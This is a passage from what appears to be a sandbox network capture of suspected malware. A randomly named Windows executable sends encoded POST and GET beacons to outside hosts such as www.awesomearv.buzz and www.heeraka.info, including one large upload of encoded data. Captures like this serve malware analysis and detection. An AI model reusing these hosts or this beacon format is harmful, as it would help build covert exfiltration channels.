ATk=qqrLv05S8tpRtHn1KSTR8jE9cCr8yV1sqp+2WA88qnfth5X4YROd9yd3q5YJ0VeU1qgZolyYWKVrmjYHD8jrFozhl21JltukTAfDDkAaU19uyGZkFCPR8jCIirzNN2NUssbonYxvlen7U/WOxaXMoDC95/+Bd5HRxu4ldZwmOd4mZY4h3y8hzA77HW2t2QuYLUXEBs44G7vipXH48BSYbvxVPNo8VmuuCEoocxZT/maG2KG7sap+t/ge9KIj7Betqsm29tHHS7f1KmcBZ0dHBDCd3GulRBq20chOKslAoQb2ZJzIXGF8yFUE83cswZ3cuKaMEIbXsFAEyeu+ZgOwA6DjZWSVVk36hCwk99beTxhcXX2KI7SI6IZHas24sIsgxBinF99iqwXROpih3Ps8c8JMnDXpJce9kwRxjeSR2J0mVl5/IVyOwEDjd6osTCm70gjktp6PUAI4cUIfEjSBCOCogWPgF6RHqhDF5fOX3rTN4fJCwDnSSB/GXrg/xtnvmoffZwK5BwA0vgpd5dvAGk08SWqHnE+BdghFo19xGpgOHvtoxTJvKCpI6FelQh3uNAtrI1J9GbLMuxbhEM9suCnSDDUVziaDc+3Z7zdxiK6+sh4gy8rZ1MQn+bAT0KVKJglAEBqVhmNVT+3UAtFgQ5pzasXuNCBCF6zFuCmyQixq29Q/w4/DtE1mwl8C4FESOYqepgd7CuSQooJx85jRctApVyOCFJMKtRi8SyafdV+YN4Gt1YbkoXxAo+5ILM2XMmJS50dEEEUonFeNeaOlbkrtfnnV1Hsa7X44lReogyYQOpQwQRtCTy7jk3fQsmo6/1NIx3yvGeQo4LDyukyscO5GyN8g/GM8H5itKYptmOF6bYs4Pi7M5bZq/Qf5V6st309yfC0v8Czos9Vv1dtz4Gg8yzRhZGzdnTqaDvQL0v+aqmH08E0vZWvIgFXO82z/+cLcL90jYED8ug0Qu7niSf2AGxy6pZ7FdCQ7hjNpkXjXIDCP [TRUNCATED]
Oct 11, 2024 10:04:44.713920116 CEST	3867	OUT	Data Raw: 47 7a 75 4f 65 31 4b 44 6b 70 69 2b 6d 7a 48 75 68 63 49 43 70 43 39 61 56 36 4d 41 70 55 65 47 61 43 79 63 62 6a 48 75 2b 37 78 66 68 78 67 36 30 46 45 6e 75 43 77 63 2b 4f 49 4d 59 7a 72 6e 6e 4f 2b 2f 71 33 42 35 43 4a 57 66 61 78 6e 4e 32 43 Data Ascii: GzuOe1KDkpi+mzHuhcICpC9aV6MApUeGaCycbjHu+7xfhxg60FEnuCwc+OIMYzrnnO+/q3B5CJWfaxnN2CsfphfnMGk3CnLYeznpetjSMz094NEwj+pyG4xkK7LIoouLDPWvQjs9HUjDUOqd7JNksD/UtWm5qp/yM0xhYZ/MaqefJahcgnEd9pIfgCw4+DicRDMGXkd7RpEixVTYYHGa6SDkmzfSPZTtBp7wpoqc0IcZBt7HDpp
Oct 11, 2024 10:04:44.713996887 CEST	1519	OUT	Data Raw: 2f 75 5a 76 57 6c 4e 76 35 30 69 61 45 77 76 50 39 42 64 31 75 56 65 55 6b 46 35 67 58 4c 42 55 4d 6e 7a 34 70 35 79 56 68 34 35 6a 32 45 64 64 79 6f 70 2f 48 42 66 67 72 71 5a 58 6b 65 39 53 79 46 6c 4b 2b 56 79 6d 6e 58 67 64 6f 4b 56 78 66 33 Data Ascii: /uZvWlNv50iaEwvP9Bd1uVeUkF5gXLBUMnz4p5yVh45j2Eddyop/HBfgrqZXke9SyFlK+VymnXgdoKVxf3WG+Hn4rsDwXVhS5P8cJHFsHoV7Y+opm4lkNZXMa6ClphZ+aDAJxH0sv7uyB0MK1fQxP87l5Cm9ZmBlEfunJwb5C7JJM1tm5Qt/vxadMPUjrHYI/D72UGs4bzFso/pLJo2CFcoGZIlhKXQluVNg8lnVfcpIyC8HjiX

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.11.20	49883	75.2.103.23	80	7868	C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 10:04:47.353178978 CEST	540	OUT	GET /o7wc/?ATk=noDrsAMitbMGukbGKxuVrzEgPh3D0G5ivpvnAiMvw1nUlPzFIxH7oxFbrZBuy0eo4pgag2ycYt5GuEsaJdfqEojluDYCwMecMBaiZUwNTn9hiFtAJi2C0g0=&VDohI=5PBL_pQpTf5haV HTTP/1.1 Host: www.heeraka.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
Oct 11, 2024 10:04:47.454982042 CEST	400	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 11 Oct 2024 08:04:47 GMT Content-Type: text/html Content-Length: 260 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 41 54 6b 3d 6e 6f 44 72 73 41 4d 69 74 62 4d 47 75 6b 62 47 4b 78 75 56 72 7a 45 67 50 68 33 44 30 47 35 69 76 70 76 6e 41 69 4d 76 77 31 6e 55 6c 50 7a 46 49 78 48 37 6f 78 46 62 72 5a 42 75 79 30 65 6f 34 70 67 61 67 32 79 63 59 74 35 47 75 45 73 61 4a 64 66 71 45 6f 6a 6c 75 44 59 43 77 4d 65 63 4d 42 61 69 5a 55 77 4e 54 6e 39 68 69 46 74 41 4a 69 32 43 30 67 30 3d 26 56 44 6f 68 49 3d 35 50 42 4c 5f 70 51 70 54 66 35 68 61 56 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?ATk=noDrsAMitbMGukbGKxuVrzEgPh3D0G5ivpvnAiMvw1nUlPzFIxH7oxFbrZBuy0eo4pgag2ycYt5GuEsaJdfqEojluDYCwMecMBaiZUwNTn9hiFtAJi2C0g0=&VDohI=5PBL_pQpTf5haV"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.11.20	49884	161.97.168.245	80	7868	C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 10:04:52.646816969 CEST	804	OUT	POST /53bw/ HTTP/1.1 Host: www.awesomearv.buzz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Origin: http://www.awesomearv.buzz Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 200 Referer: http://www.awesomearv.buzz/53bw/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4 Data Raw: 41 54 6b 3d 2f 34 63 57 41 71 57 4d 6f 2f 35 59 4f 68 44 70 50 6b 69 73 63 41 34 75 70 4b 31 63 74 5a 74 48 6c 36 4a 2f 44 75 39 47 63 69 32 4a 42 33 70 79 46 69 54 66 41 59 57 30 51 62 66 4d 33 4c 35 4b 30 31 64 34 50 6f 35 62 36 62 6d 65 72 68 61 4d 6d 2b 37 57 51 6f 41 78 38 30 45 30 56 50 74 54 6e 58 32 44 4f 46 6a 57 35 30 6a 6a 6c 6d 6a 41 50 46 5a 71 31 39 34 42 62 4d 68 37 57 6d 31 67 4d 30 7a 34 5a 59 6c 76 32 56 78 67 32 78 73 76 41 31 39 79 62 65 37 73 5a 69 4b 62 53 69 44 37 6f 4f 6c 74 39 77 76 38 5a 49 4d 44 50 47 6d 73 79 79 37 56 49 30 55 4f 4d 5a 4f 58 55 30 4c 4e 69 51 3d 3d Data Ascii: ATk=/4cWAqWMo/5YOhDpPkiscA4upK1ctZtHl6J/Du9Gci2JB3pyFiTfAYW0QbfM3L5K01d4Po5b6bmerhaMm+7WQoAx80E0VPtTnX2DOFjW50jjlmjAPFZq194BbMh7Wm1gM0z4ZYlv2Vxg2xsvA19ybe7sZiKbSiD7oOlt9wv8ZIMDPGmsyy7VI0UOMZOXU0LNiQ==
Oct 11, 2024 10:04:52.823966980 CEST	1289	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 11 Oct 2024 08:04:52 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding ETag: W/"66cd104a-b96" Content-Encoding: gzip Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED] Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z\|Q&8UjXB]O;g}\|5@Ro&i<b)~KmA5n)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V\|NRkPqcq?mDEN&BFtKGQ/xI %iO\|CqCJAtV"\|"@(3'!A>0HpL(pHP8G,$Qc(aL`!I> [TRUNCATED]
Oct 11, 2024 10:04:52.823978901 CEST	317	IN	Data Raw: f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0 27 07 2f 88 08 5d b8 dd 9d c3 da 74 74 30 c5 f1 c0 04 7b 7b cc 88 10 22 a1 98 47 c4 0f 38 8a c0 41 97 ae 98 04 90 82 7e c6 a8 8b de e5 5b 46 90 0d 8e 03 08 19 Data Ascii: wlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5LznQVT)F[EG{^kTs0N[JJ

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.11.20	49885	161.97.168.245	80	7868	C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 10:04:55.361366034 CEST	824	OUT	POST /53bw/ HTTP/1.1 Host: www.awesomearv.buzz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Origin: http://www.awesomearv.buzz Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 220 Referer: http://www.awesomearv.buzz/53bw/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4 Data Raw: 41 54 6b 3d 2f 34 63 57 41 71 57 4d 6f 2f 35 59 49 77 7a 70 49 47 4b 73 49 51 34 68 30 36 31 63 6e 35 74 4c 6c 36 46 2f 44 75 55 4e 63 77 53 4a 42 57 5a 79 43 67 72 66 48 59 57 30 46 72 66 4e 71 37 35 2f 30 31 59 46 50 71 74 62 36 66 47 65 72 6c 65 4d 6d 4a 50 56 51 34 41 7a 78 55 45 6c 62 76 74 54 6e 58 32 44 4f 46 65 37 35 30 72 6a 6b 58 7a 41 50 68 46 70 2f 64 34 43 50 63 68 37 53 6d 31 6b 4d 30 7a 57 5a 59 56 42 32 58 5a 67 32 78 63 76 52 45 39 7a 42 4f 37 75 64 69 4c 74 55 67 79 73 6e 4d 78 79 2b 68 4c 66 52 71 41 4e 4b 51 33 32 76 41 50 78 4c 6e 49 38 49 70 33 2f 57 32 4b 57 2f 52 6a 2b 54 64 6a 68 70 52 6b 62 43 48 53 37 62 46 73 6c 45 63 38 3d Data Ascii: ATk=/4cWAqWMo/5YIwzpIGKsIQ4h061cn5tLl6F/DuUNcwSJBWZyCgrfHYW0FrfNq75/01YFPqtb6fGerleMmJPVQ4AzxUElbvtTnX2DOFe750rjkXzAPhFp/d4CPch7Sm1kM0zWZYVB2XZg2xcvRE9zBO7udiLtUgysnMxy+hLfRqANKQ32vAPxLnI8Ip3/W2KW/Rj+TdjhpRkbCHS7bFslEc8=
Oct 11, 2024 10:04:55.534128904 CEST	1289	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 11 Oct 2024 08:04:55 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding ETag: W/"66cd104a-b96" Content-Encoding: gzip Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED] Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z\|Q&8UjXB]O;g}\|5@Ro&i<b)~KmA5n)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V\|NRkPqcq?mDEN&BFtKGQ/xI %iO\|CqCJAtV"\|"@(3'!A>0HpL(pHP8G,$Qc(aL`!I> [TRUNCATED]
Oct 11, 2024 10:04:55.534138918 CEST	317	IN	Data Raw: f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0 27 07 2f 88 08 5d b8 dd 9d c3 da 74 74 30 c5 f1 c0 04 7b 7b cc 88 10 22 a1 98 47 c4 0f 38 8a c0 41 97 ae 98 04 90 82 7e c6 a8 8b de e5 5b 46 90 0d 8e 03 08 19 Data Ascii: wlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5LznQVT)F[EG{^kTs0N[JJ

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.11.20	49886	161.97.168.245	80	7868	C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 10:04:58.065799952 CEST	1289	OUT	POST /53bw/ HTTP/1.1 Host: www.awesomearv.buzz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Origin: http://www.awesomearv.buzz Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 7368 Referer: http://www.awesomearv.buzz/53bw/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4 Data Raw: 41 54 6b 3d 2f 34 63 57 41 71 57 4d 6f 2f 35 59 49 77 7a 70 49 47 4b 73 49 51 34 68 30 36 31 63 6e 35 74 4c 6c 36 46 2f 44 75 55 4e 63 77 61 4a 42 41 74 79 43 42 72 66 47 59 57 30 45 72 66 49 71 37 35 59 30 78 30 4a 50 71 77 75 36 64 2b 65 71 47 47 4d 75 63 6a 56 65 34 41 7a 75 45 45 31 56 50 74 61 6e 58 6d 48 4f 46 75 37 35 30 72 6a 6b 55 62 41 62 6c 5a 70 35 64 34 42 62 4d 68 2f 57 6d 31 63 4d 33 44 67 5a 63 4a 2f 32 6e 35 67 32 52 4d 76 43 57 56 7a 5a 65 37 6f 61 69 4c 6c 55 67 2f 72 6e 4b 56 45 2b 68 2f 35 52 74 63 4e 4b 6d 32 4f 79 53 58 75 51 32 30 6c 43 4c 7a 57 5a 58 6d 2f 33 32 33 35 5a 73 33 41 69 78 45 30 49 58 57 45 42 31 55 79 59 61 5a 4c 4d 78 39 44 34 77 36 34 62 31 4f 4a 76 50 50 77 47 7a 31 62 65 4f 57 61 53 6e 54 78 66 33 54 46 47 54 61 6d 45 64 79 2b 4b 33 62 73 57 5a 4b 48 6d 6b 6c 74 69 6b 4b 2b 63 44 74 79 70 51 38 2b 63 46 50 78 4c 45 66 4e 75 78 4f 74 32 4a 35 34 72 74 51 77 64 53 46 34 7a 77 4e 47 53 36 53 78 51 69 53 42 6c 56 48 51 43 52 6d 62 78 71 4e 55 6c 48 70 55 54 39 [TRUNCATED] Data Ascii: ATk=/4cWAqWMo/5YIwzpIGKsIQ4h061cn5tLl6F/DuUNcwaJBAtyCBrfGYW0ErfIq75Y0x0JPqwu6d+eqGGMucjVe4AzuEE1VPtanXmHOFu750rjkUbAblZp5d4BbMh/Wm1cM3DgZcJ/2n5g2RMvCWVzZe7oaiLlUg/rnKVE+h/5RtcNKm2OySXuQ20lCLzWZXm/3235Zs3AixE0IXWEB1UyYaZLMx9D4w64b1OJvPPwGz1beOWaSnTxf3TFGTamEdy+K3bsWZKHmkltikK+cDtypQ8+cFPxLEfNuxOt2J54rtQwdSF4zwNGS6SxQiSBlVHQCRmbxqNUlHpUT9jL+2DHHpa1KZBsILdInA17JRl0sUiOvablvuvlApJyzJtySlISJFln/lGWTgDfnlkZUW6KYirfyRl9ctKQuX0MmJ0FvmgjNQgOVqKFUglOWqSz/VMDH1/xskrDjLWJimlqE4LDj9KWyGqH6AkL/NmmVm6Jdh+1glMcSEkjPbETChcIU54VL9Ov2vhcJmVA8ffCoDqz6+LizVjMJ7N3lf9Bdwgf35YLIi/O4Ffaeep08njDNwfmKHndIM+V/egr1qakD23UT4OW2ecxHKa4lmHCrnC0Iao/sr0pDr4DVpvP53f6oAmqIthJjtWxdXEJeIakPiIo63mbkAfPKHO7O07aCn8J
Oct 11, 2024 10:04:58.065829992 CEST	5156	OUT	Data Raw: 59 45 74 72 70 6b 54 59 4a 68 65 6f 6e 2f 6d 51 57 6e 33 57 65 42 37 51 41 6b 4e 4b 46 36 69 73 4e 42 54 7a 64 76 4d 54 54 6a 68 35 43 36 34 44 4c 30 65 2b 73 52 52 6b 67 34 64 56 53 53 66 69 77 32 5a 74 76 7a 70 79 4d 67 45 6e 4e 70 59 7a 57 69 Data Ascii: YEtrpkTYJheon/mQWn3WeB7QAkNKF6isNBTzdvMTTjh5C64DL0e+sRRkg4dVSSfiw2ZtvzpyMgEnNpYzWid494NdAAKhyXAz/UIDpgqCYb0kLmhTxgtVOkq+aylw5U9C9q8o2SFNCu4aob3qA1umKDhSbNgLH5xoHADr5uMHP5MVADU3tg6KSGEy4VBen4PcKm6CNeRrKh18kmXbO518kVWVNgFVlR9Az++xjFaxOiT9m5kavo0
Oct 11, 2024 10:04:58.065886021 CEST	1289	OUT	Data Raw: 45 34 58 73 51 33 51 59 50 64 75 53 61 62 67 34 4c 6a 5a 50 77 57 38 55 70 55 61 72 42 52 7a 45 58 6c 78 51 70 4d 37 54 6b 32 4e 67 31 38 47 6b 6b 5a 52 4d 39 42 4c 4b 7a 30 64 78 35 4f 7a 76 7a 56 62 77 2b 6d 6b 38 68 41 58 4f 46 35 61 37 33 4a Data Ascii: E4XsQ3QYPduSabg4LjZPwW8UpUarBRzEXlxQpM7Tk2Ng18GkkZRM9BLKz0dx5OzvzVbw+mk8hAXOF5a73Jdj7jQQlPKs0jYwPXiz0IAYpQtNAJVqwtG2sBD3lIUG+hXn9/YEq1lA99rp3J5Huz2OS+iNyX8YYe0wcHQsbuKRFImAyPPmkM5LFpWDUyxnh4kgJHf+R9iK5SqeVOCetyvJo9UFrd5x0mGUP7IDDX6hr9BVxSXvMXa
Oct 11, 2024 10:04:58.065996885 CEST	239	OUT	Data Raw: 4e 32 2f 4d 34 2b 44 7a 41 34 6f 33 56 32 39 4f 65 54 4e 39 53 45 52 65 33 45 30 79 59 49 61 63 74 34 79 33 59 46 33 41 6e 70 45 72 50 61 6f 58 4c 69 58 6c 43 4a 32 32 6e 6a 31 5a 63 72 37 34 6b 59 68 46 47 54 45 32 70 6b 38 2b 39 37 42 57 71 45 Data Ascii: N2/M4+DzA4o3V29OeTN9SERe3E0yYIact4y3YF3AnpErPaoXLiXlCJ22nj1Zcr74kYhFGTE2pk8+97BWqEiBMwCza/dLH6+coSpq1VHy3FhFwe8Y/LGPSWm5clwrPABwkcC0+kHop07Tb+pkgw1ivbu29imBO4nbo3vHI1AJQARsTDvg3woMqbkESHnIrZN5QbVVvTxmlL5mq/kNBnthM8fd/TKehEBgUpGJToAKt8PJg==
Oct 11, 2024 10:04:58.241687059 CEST	1289	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 11 Oct 2024 08:04:58 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding ETag: W/"66cd104a-b96" Content-Encoding: gzip Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED] Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z\|Q&8UjXB]O;g}\|5@Ro&i<b)~KmA5n)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V\|NRkPqcq?mDEN&BFtKGQ/xI %iO\|CqCJAtV"\|"@(3'!A>0HpL(pHP8G,$Qc(aL`!I> [TRUNCATED]
Oct 11, 2024 10:04:58.241729021 CEST	317	IN	Data Raw: f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0 27 07 2f 88 08 5d b8 dd 9d c3 da 74 74 30 c5 f1 c0 04 7b 7b cc 88 10 22 a1 98 47 c4 0f 38 8a c0 41 97 ae 98 04 90 82 7e c6 a8 8b de e5 5b 46 90 0d 8e 03 08 19 Data Ascii: wlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5LznQVT)F[EG{^kTs0N[JJ

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.11.20	49887	161.97.168.245	80	7868	C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 10:05:00.763211966 CEST	543	OUT	GET /53bw/?ATk=y602DfOxy8k4aDGeL2LafnkTvLx8g5VEvf5zKPNxBw/5ZQtnSgrsDIOhG/LT94BV3SRTeLh29bGmgRGfpvfkXpkrxRE8C/BpnF37AgHX90StwlvjASc62/Y=&VDohI=5PBL_pQpTf5haV HTTP/1.1 Host: www.awesomearv.buzz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
